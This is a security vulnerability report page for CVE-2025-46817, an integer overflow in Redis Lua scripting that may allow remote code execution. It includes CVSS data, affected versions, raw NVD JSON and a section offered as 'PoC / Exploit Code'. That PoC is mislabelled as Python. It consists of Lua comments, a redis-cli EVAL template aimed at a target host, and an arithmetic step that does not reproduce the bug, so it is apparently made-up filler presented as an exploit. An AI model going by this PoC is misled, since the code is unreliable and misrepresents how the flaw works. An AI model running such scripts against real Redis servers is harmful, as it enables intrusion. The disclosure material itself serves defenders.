Security Vulnerability Report
中文
CVE-2025-46817 CVSS 7.0 HIGH

CVE-2025-46817

Published: 2025-10-03 18:15:36
Last Modified: 2026-01-27 19:37:39
Source: [email protected]

Description

Redis is an open source, in-memory database that persists on disk. Versions 8.2.1 and below allow an authenticated user to use a specially crafted Lua script to cause an integer overflow and potentially lead to remote code execution The problem exists in all versions of Redis with Lua scripting. This issue is fixed in version 8.2.2.

CVSS Details

CVSS Score
7.0
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:redis:redis:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:redis:redis:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:redis:redis:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:redis:redis:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:redis:redis:*:*:*:*:*:*:*:* - VULNERABLE
Redis <= 8.2.1
Redis 所有启用Lua脚本功能的版本

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
-- CVE-2025-46817 PoC: Redis Lua Script Integer Overflow -- This PoC demonstrates the integer overflow vulnerability in Redis Lua scripting -- that can lead to remote code execution (RCE) -- Step 1: Connect to Redis with low-privilege authentication -- redis-cli -h target_host -p 6379 -a password -- Step 2: Exploit integer overflow via crafted Lua script -- The script triggers integer overflow in Redis internal processing -- causing memory corruption that can be leveraged for code execution local overflow_payload = [[ -- Trigger integer overflow in Redis Lua engine -- Manipulate type conversion or memory allocation calculations local malicious_value = 0x7FFFFFFFFFFFFFFF -- Maximum int64 value local result = redis.call('SET', 'overflow_key', malicious_value) -- Attempt to trigger overflow through arithmetic operations -- that Redis processes internally local trigger = malicious_value + 1 -- This causes overflow to negative -- Use cjson or other Redis Lua libraries that may be affected -- by the integer overflow condition return trigger ]] -- Step 3: Execute the malicious Lua script via EVAL command -- EVAL "<script>" 0 -- redis-cli EVAL "<crafted_lua_script>" 0 -- Note: Actual exploitation requires careful crafting of the Lua script -- to target specific integer overflow paths in Redis version <= 8.2.1 -- The fix was applied in commit fc9abc775e308374f667fdf3e723ef4b7eb0e3ca -- and released in Redis 8.2.2

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-46817", "sourceIdentifier": "[email protected]", "published": "2025-10-03T18:15:35.527", "lastModified": "2026-01-27T19:37:38.907", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Redis is an open source, in-memory database that persists on disk. Versions 8.2.1 and below allow an authenticated user to use a specially crafted Lua script to cause an integer overflow and potentially lead to remote code execution The problem exists in all versions of Redis with Lua scripting. This issue is fixed in version 8.2.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.0, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.0, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-190"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:redis:redis:*:*:*:*:*:*:*:*", "versionEndExcluding": "6.2.20", "matchCriteriaId": "C2F4D4F6-6F7C-46BC-B37C-DFAC34B097AC"}, {"vulnerable": true, "criteria": "cpe:2.3:a:redis:redis:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.0", "versionEndExcluding": "7.2.11", "matchCriteriaId": "4F82BD2A-473F-4F3F-9C80-C6448D07C45D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:redis:redis:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.4.0", "versionEndExcluding": "7.4.6", "matchCriteriaId": "F6E336B8-E000-4EFA-95F8-F2B74A4913F0"}, {"vulnerable": true, "criteria": "cpe:2.3:a:redis:redis:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.0.0", "versionEndExcluding": "8.0.4", "matchCriteriaId": "459EBC07-D37A-44E5-95DB-4C3FD9F008FF"}, {"vulnerable": true, "criteria": "cpe:2.3:a:redis:redis:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.2.0", "versionEndExcluding": "8.2.2", "matchCriteriaId": "CBF13EC1-FE0A-4242-B8D3-2681485DDDF2"}]}]}], "references": [{"url": "https://github.com/redis/redis/commit/fc9abc775e308374f667fdf3e723ef4b7eb0e3ca", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/redis/redis/releases/tag/8.2.2", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/redis/redis/security/advisories/GHSA-m8fj-85cg-7vhp", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.